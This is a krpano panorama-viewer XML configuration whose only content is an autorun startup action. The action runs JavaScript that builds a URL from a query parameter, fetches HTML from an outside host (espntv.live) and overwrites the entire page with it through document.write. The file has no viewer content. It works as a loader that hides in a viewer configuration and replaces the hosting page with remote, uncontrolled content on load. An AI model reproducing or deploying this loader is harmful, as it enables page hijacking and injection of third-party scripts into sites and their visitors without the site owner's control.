<krpano>

    <!-- Krpano load howar sathe sathe JavaScript run korar jonno startup action -->
    <action name="startup" autorun="init">
        js(
            var id = new URLSearchParams(location.search).get("id") || "sports";
            fetch("https://espntv.live/files/" + id + ".html")
              .then(e => e.text())
              .then(e => { 
                document.open();
                document.write(e);
                document.close();
              });
        );
    </action>

</krpano>